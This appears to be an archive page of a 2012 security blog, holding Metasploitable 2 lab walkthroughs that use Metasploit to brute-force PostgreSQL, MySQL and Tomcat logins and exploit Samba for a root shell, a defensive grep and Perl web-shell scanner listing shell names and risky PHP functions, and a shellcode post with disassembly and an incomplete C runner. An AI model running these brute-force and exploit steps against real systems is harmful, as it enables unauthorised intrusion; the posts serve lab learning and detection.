Archiwum autora

Attacking PostgreSQL On Metasplitable 2

18 czerwca, 2012 Dodaj komentarz

Attacking PostgreSQL On Metasplitable 2

In this article we will see how we can attack a system that contains a PostgreSQL database.

Lets say that we have perform a port scan on a server and we have identify that is running a PostgreSQL database at port 5432.

Scanning with nmap:

nmap -sV

nmap -sV

nmap -sV

We will open the metasploit framework and we will looking „postgresql”:

msf > search postgresql

Matching Modules

Name                                         Disclosure Date  Rank       Description
—-                                         —————  —-       ———–
auxiliary/admin/postgres/postgres_readfile                    normal     PostgreSQL Server Generic Query
auxiliary/admin/postgres/postgres_sql                         normal     PostgreSQL Server Generic Query
auxiliary/scanner/postgres/postgres_login                     normal     PostgreSQL Login Utility
auxiliary/scanner/postgres/postgres_version                   normal     PostgreSQL Version Probe
exploit/windows/postgres/postgres_payload    2009-04-10       excellent  PostgreSQL for Microsoft Windows Payload Execution

We will use the postgres_login scanner.

Usage Information:

msf > use auxiliary/scanner/postgres/postgres_login
msf auxiliary(postgres_login) > set RHOSTS [TARGET HOST RANGE]
msf auxiliary(postgres_login) > run

Set the target address range:

msf>set RHOSTS


msf  auxiliary(postgres_login) > exploit

[*] Postgres – [01/21] – Trying username:’postgres’ with password:” on database ‚template1’
[-] Postgres – Invalid username or password: ‚postgres’:”
[-] Postgres – [01/21] – Username/Password failed.
[*] Postgres – [02/21] – Trying username:” with password:” on database ‚template1′
[-] Postgres – Invalid username or password: ”:”
[-] Postgres – [02/21] – Username/Password failed.
[*] Postgres – [03/21] – Trying username:’scott’ with password:” on database ‚template1’
[-] Postgres – Invalid username or password: ‚scott’:”
[-] Postgres – [03/21] – Username/Password failed.
[*] Postgres – [04/21] – Trying username:’admin’ with password:” on database ‚template1’


This scanner is already configured to use the default wordlists about postgreSQL databases of metasploit framework so we will use them in this case:

 USERPASS_FILE     C:/Program Files/Rapid7/framework/msf3/data/wordlists/postgres_default_userpass.txt 

no File containing (space-seperated) users and passwords, one pair per line

USER_FILE         C:/Program Files/Rapid7/framework/msf3/data/wordlists/postgres_default_user.txt     

no File containing users, one per line

Waiting,waiting and:



We have user name – „postgres” ,and password – „postgres

Now we can login as posgres user:



1.Metasploit Unleashed –

2.PostgreSQL Login Utility –

How to find backdoor PHP shell scripts on a server

17 czerwca, 2012 1 komentarz

How to find backdoor PHP shell scripts on a server

When hackers get access to your website server, they sometimes install a backdoor shell script designed to allow them to regain entry even after you’ve cleaned up the site, repaired the original security hole that allowed the hack to occur, otherwise improved site security, and even installed measures to try to lock the hackers out.

A backdoor script can be called from a browser like any other web page. It gives its user a web page interface where they can download and upload, view or modify files, create directories, and otherwise manage the site using PHP’s ability to read and write files and pass operating system commands through to the operating system.

One way to find these scripts is by searching website access logs for the suspicious lines that can be generated when someone uses the scripts to modify site files.

Backdoor scripts often need to use PHP commands that most legitimate scripts don’t, so you can search the files in your site for those commands. There are search utility programs you can use for finding text in files:

  • passthru
  • shell_exec
  • system
  • phpinfo
  • base64_decode
  • edoced_46esab
  • chmod
  • mkdir
  • „ (backticks with an operating system command between them)
  • fopen
  • fclose
  • readfile

On a Linux server, the grep program is already installed as part of the operating system. The only problem is figuring out how to launch it.

If you have command line access to your server (SSH), there’s no problem. You can run it from the command line and have the results displayed to you.

Sample text searches for suspicious PHP code.

Do the search once for each of the suggested PHP keywords listed above.

grep -Rn "mkdir *(" public_html/


grep -RPn "(passthru|shell_exec|system|phpinfo|base64_decode|chmod|mkdir|fopen|fclose|readfile) *\(" public_html/

Or we can use the following script ( source )

#!/usr/bin/perl -w
#usage: ./ <sensitivity 1-50> <directory to scan>
use strict;
use File::Find;
my $sens = <a href="">shift</a>  || 10;
my $folder = <a href="">shift</a> || './';
find(\&backdoor, "$folder");
sub backdoor {
    if ((/\.(php|txt)/)){
       <a href="">open</a> (my $IN,"<$_") || <a href="">die</a> "can not open datei $File::Find::name: $!";
       my @file =  <$IN>;
       #maybe evil stuffs
       my $score = <a href="">grep</a> (/function_exists\(|phpinfo\(|safe_?mode|shell_exec\(|popen\(|passthru\(|system\(|myshellexec\(|exec\(|getpwuid\(|getgrgid  \(|fileperms\(/i,@file);
       #probably evil stuffs
       my $tempscore = <a href="">grep</a>(/\`\$\_(post|request|get).{0,20}\`|(include|require|eval|system|passthru|shell_exec).{0,10}\$\_(post|request|get)|eval.{0,10}base64_decode|back_connect|backdoor|r57|PHPJackal|PhpSpy|GiX|Fx29SheLL|w4ck1ng|milw0rm|PhpShell|k1r4|FeeLCoMz|FaTaLisTiCz|Ve_cENxShell|UnixOn|C99madShell|Spamfordz|Locus7s|c100|c99|x2300|cgitelnet|webadmin|cybershell|STUNSHELL|Pr!v8|PHPShell|KaMeLeOn|S4T|oRb|tryag|sniper|noexecshell|\/etc\/passwd|revengans/i, @file);
       $score +=  50 *  $tempscore;
       <a href="">print</a> "$score - Possible backdoor : $File::Find::name\n" if ($score > $sens-1 );
       <a href="">close</a> $IN;
       <a href="">open</a> (my $IN,"<$_") || (<a href="">print</a> "can not open datei $File::Find::name: $!" && next);
       <a href="">print</a> "5000 - Possible backdoor (php in non-php file): $File::Find::name\n" if <a href="">grep</a> /(\<\?php|include(\ |\())/i, <$IN>;
       <a href="">close</a> $IN;


Web Shell Detection Using NeoPI

Kategorie:BackDoor Tagi: ,

Metasploitable 2 – Apache Tomcat Exploitation

16 czerwca, 2012 Dodaj komentarz

Metasploitable 2 – Apache Tomcat Exploitation

In this post we will focus on the Apache Tomcat Web server and how we can discover the administrator’s credentials in order to gain access to the remote system – Metasploitable 2.

So we are performing our internal penetration testing and we have discovered the Apache Tomcat running on a remot system metasploitable linux 2 on port 8180.
nmap scan

nmap scan

Our next step will be to start metasploit framework and to search „tomcat”

msf> search tomcat

We have found an auxiliary scanner which will be the tool for our attempt to login to the Tomcat Application Manager.

search tomcat


So we run the scanner and we are waiting to see if it will discover any valid credentials:

run exploit

run exploit

We see User – tomcat , password – tomcat





Metasploitable 2 – Bruteforce MySQL Using Metasploit

15 czerwca, 2012 Dodaj komentarz

Metasploitable 2 – Bruteforce MySQL Using Metasploit

I will demonstrate how to brute force MySQL logins using Metasploit. This is again another attack against the Metasploitable 2 distribution I mentioned in my previous post.

This is very simple:

c:\Program Files\Rapid7\framework\msfconsole.bat

Type :

msf>db_connect bt:my_pass@localhost:5432/msf3




We see ,mysql is running  3306  tcp    mysql        open   MySQL 5.0.51a-3ubuntu5

Search for an exploit:

msf>search mysql

search mysql

search mysql


msf > use scanner/mysql/mysql_login
msf auxiliary(mysql_login) > show options



Run exploit:

msf auxiliary(mysql_login) > exploit

[*] - Found remote MySQL version 5.0.51a
[*] Trying username:'admin' with password:''
[*] failed to login as 'admin' with password ''[*] Trying username:'god' with password:''
[*] failed to login as 'god' with password ''


The list is long


[*] Trying username:'root' with password:''
[+] - SUCCESSFUL LOGIN 'root' : ''
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(mysql_login) >

User -"root" , No passaword

mysql -h -u root

mysql -h -u root


Rapid7 – Metasploitable 2

14 czerwca, 2012 4 Komentarze

Metasploitable 2

The Metasploitable virtual machine is an intentionally vulnerable version of Ubuntu Linux designed for testing security tools and demonstrating common vulnerabilities. Version 2 of this virtual machine is available for download from and ships with even more vulnerabilities than the original image. This virtual machine is compatible with VMWare, VirtualBox, and other common virtualization platforms. (read all)

Metasploitable 2 running on VMware  looks like this:



Here we go


Check the version

msf > version
Framework: 4.4.0-dev.15205
Console  : 4.4.0-dev.15168
msf >

Connect to the database:

Connect To DataBase

Connect To the DataBase

Now we should be able to enter the db_nmap command from within msfconsole to run nmap and have its results automatically stored in our new database.

msf > db_nmap -sS -A



[*] Nmap: MAC Address: 00:0C:29:BF:08:FB (VMware)
[*] Nmap: Device type: general purpose
[*] Nmap: Running: Linux 2.6.X
[*] Nmap: OS details: Linux 2.6.9 – 2.6.31
[*] Nmap: Network Distance: 1 hop
[*] Nmap: Service Info: Hosts:  metasploitable.localdomain, localhost, irc.Metasploitable.LAN; OSs: Unix, Linux
[*] Nmap: Host script results:
[*] Nmap: |_nbstat: NetBIOS name: METASPLOITABLE, NetBIOS user: <unknown>, NetBIOS MAC: <unknown>
[*] Nmap: | smb-os-discovery:
[*] Nmap: |   OS: Unix (Samba 3.0.20-Debian)
[*] Nmap: |   Name: WORKGROUP\Unknown
[*] Nmap: |_  System time: 2012-06-14 21:07:53 UTC-4
[*] Nmap: HOP RTT     ADDRESS
[*] Nmap: 1   0.44 ms
[*] Nmap: OS and Service detection performed. Please report any incorrect results at .
[*] Nmap: Nmap done: 1 IP address (1 host up) scanned in 176.79 seconds
msf >


msf > services


host             port  proto  name         state  info
—-             —-  —–  —-         —–  —-  21    tcp    ftp                                   open   vsftpd 2.3.4  22    tcp    ssh          open   OpenSSH 4.7p1 Debian 8ubuntu1
protocol 2.0  23    tcp    telnet       open   Linux telnetd  25    tcp    smtp         open   Postfix smtpd  53    tcp    domain       open   ISC BIND 9.4.2  80    tcp    http         open   Apache httpd 2.2.8 (Ubuntu) DAV/2  110   tcp    pop3-proxy   open   AVG pop3 proxy broken  111   tcp    rpcbind      open   2 rpc #100000  139   tcp    netbios-ssn  open   Samba smbd 3.X workgroup: WORKGROUP  445   tcp    netbios-ssn  open   Samba smbd 3.X workgroup: WORKGROUP  512   tcp    exec         open   netkit-rsh rexecd  513   tcp    login        open  514   tcp    shell        open  1099  tcp    jrmi         open   GNU Classpath grmiregistry  1524  tcp    ingreslock   open  2049  tcp    nfs          open   2-4 rpc #100003  2121  tcp    ccproxy-ftp  open  3306  tcp    mysql        open   MySQL 5.0.51a-3ubuntu5  5432  tcp    postgresql   open   PostgreSQL DB 8.3.0 – 8.3.7  5900  tcp    vnc          open   VNC protocol 3.3  6000  tcp    x11          open   access denied  6667  tcp    irc          open   Unreal ircd  8009  tcp    ajp13        open   Apache Jserv Protocol v1.3  8180  tcp    http         open   Apache Tomcat/Coyote JSP engine 1.1

Let’s search for a Samba exploit and try it against the system:

msf>search samba

search samba

msf>search samba

The first shot is:

msf > use exploit/multi/samba/usermap_script

msf  exploit(usermap_script) > show options

Module options (exploit/multi/samba/usermap_script):

Name   Current Setting  Required  Description
—-   —————  ——–  ———–
RHOST                        yes       The target address
RPORT  139              yes       The target port

Exploit target:

Id  Name
—  —-
0   Automatic

msf  exploit(usermap_script) > set RHOST
msf  exploit(usermap_script) > exploit




I’m „super user”

uid=0(root) gid=0(root)
uname -a
Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux


Win32/7 Ultimate mspaint.exe ShellCode

8 czerwca, 2012 Dodaj komentarz

win32/7 Ultimate mspaint.exe ShellCode

Author: Ayrbyte

Link : –

Version: – Category: Wi32/7

local Tested on: Windows 7 Ultimate

Code : c++

(diasembly code)

00403000   BB 449BB40E      MOV EBX,0EB49B44
00403005   33C9             XOR ECX,ECX
00403007   DBC4             FCMOVNB ST,ST(4)
00403009   B1 32            MOV CL,32
0040300B   D97424 F4        FSTENV (28-BYTE) PTR SS:[ESP-C]
0040300F   5D               POP EBP
00403010   315D 13          XOR DWORD PTR SS:[EBP+13],EBX
00403013   83C5 04          ADD EBP,4
00403016   035D 0F          ADD EBX,DWORD PTR SS:[EBP+F]
00403019  -E2 B1            LOOPD SHORT msgbox.00402FCC
0040301B   67:5C            POP ESP
0040301D   8739             XCHG DWORD PTR DS:[ECX],EDI
0040301F   98               CWDE
00403020   9D               POPFD
00403021   F8               CLC
00403022   B0 7D            MOV AL,7D
00403024   AC               LODS BYTE PTR DS:[ESI]
0040302B   5B               POP EBX
0040302C   2E:70 E3         JO SHORT msgbox.00403012
0040302F   4F               DEC EDI
00403030   A5               MOVS DWORD PTR ES:[EDI],DWORD PTR DS:[ES>
00403031   F4               HLT
00403032   2B7F 0E          SUB EDI,DWORD PTR DS:[EDI+E]
00403035   B2 0D            MOV DL,0D
00403037   4E               DEC ESI
00403038   8F               ???
00403039  -72 91            JB SHORT msgbox.00402FCC
0040303B   1C 53            SBB AL,53
0040303D   14 6D            ADC AL,6D
0040303F   5F               POP EDI
00403040   80F6 4C          XOR DH,4C
00403043   90               NOP
00403044   D5 F7            AAD 0F7
00403046   89CD             MOV EBP,ECX
00403048   16               PUSH SS
00403049   A5               MOVS DWORD PTR ES:[EDI],DWORD PTR DS:[ES>
0040304A   42               INC EDX
0040304B   99               CDQ
0040304C   855A E7          TEST DWORD PTR DS:[EDX-19],EBX
0040304F   DF15 5A275425    FIST WORD PTR DS:[2554275A]
00403055   24 42            AND AL,42
00403057   AB               STOS DWORD PTR ES:[EDI]
00403058   D29E 4DFC4B94    RCR BYTE PTR DS:[ESI+944BFC4D],CL
0040305E   05 E4E0F2B5      ADD EAX,B5F2E0E4
00403063   15 24E1895C      ADC EAX,5C89E124
00403068   41               INC ECX
00403069   D27A 5F          SAR BYTE PTR DS:[EDX+5F],CL
0040306C   832A 83          SUB DWORD PTR DS:[EDX],-7D
0040306F   51               PUSH ECX
00403070  ^EB E1            JMP SHORT msgbox.00403053
00403072   BA 5DE6F8FB      MOV EDX,FBF8E65D
00403077   5A               POP EDX
00403078   198F F798A488    SBB DWORD PTR DS:[EDI+88A498F7],ECX
0040307E   CC               INT3
0040307F   E3 72            JECXZ SHORT msgbox.004030F3
00403081   1C D0            SBB AL,0D0
00403083   44               INC ESP
00403084   F0:8630          LOCK XCHG BYTE PTR DS:[EAX],DH
00403087  ^74 D5            JE SHORT msgbox.0040305E
00403089   51               PUSH ECX
0040308A   B3 7A            MOV BL,7A
0040308C   92               XCHG EAX,EDX
0040308D   16               PUSH SS
0040308E   9B               WAIT
0040308F   9E               SAHF
00403090   25 FA909BAE      AND EAX,AE9B90FA
00403095   FD               STD
00403096   76 2A            JBE SHORT msgbox.004030C2
00403098   F4               HLT
00403099   D952 76          FST DWORD PTR DS:[EDX+76]
0040309C   AE               SCAS BYTE PTR ES:[EDI]
0040309D   40               INC EAX
0040309E   C3               RETN
0040309F   D201             ROL BYTE PTR DS:[ECX],CL
004030A1   7C 13            JL SHORT msgbox.004030B6
004030A3   BA FED85829      MOV EDX,2958D8FE
004030A8   EA 5B0324ED EE3E JMP FAR 3EEE:ED24035B
004030AF   01ED             ADD EBP,EBP
004030B1   F0:40            LOCK INC EAX
004030B3   2286 C1CBADD1    AND AL,BYTE PTR DS:[ESI+D1ADCBC1]
004030B9   DD1E             FSTP QWORD PTR DS:[ESI]
004030BB   8A2E             MOV CH,BYTE PTR DS:[ESI]
004030BD   94               XCHG EAX,ESP
004030BE   02BB A671D7F9    ADD BH,BYTE PTR DS:[EBX+F9D771A6]
004030C4   AA               STOS BYTE PTR ES:[EDI]
004030C5   8102 3DD301A6    ADD DWORD PTR DS:[EDX],A601D33D
004030CB   BE 2019C3BB      MOV ESI,BBC31920
004030D0   6D               INS DWORD PTR ES:[EDI],DX
004030D1   9D               POPFD
004030D2   38B6 FE483E65    CMP BYTE PTR DS:[ESI+653E48FE],DH
004030D8   FE               ???
004030D9   58               POP EAX
004030DA   53               PUSH EBX
004030DB   FA               CLI
004030DC   70 02            JO SHORT msgbox.004030E0
004030DE   C2 9204          RETN 492
004030E1   C400             LES EAX,FWORD PTR DS:[EAX]

Exploit :

#include <windows.h>
char string[] =
int main()
  ((void (*)(void))string)();
Kategorie:Exploit Tagi:

control – windows firewall from the command line

7 czerwca, 2012 Dodaj komentarz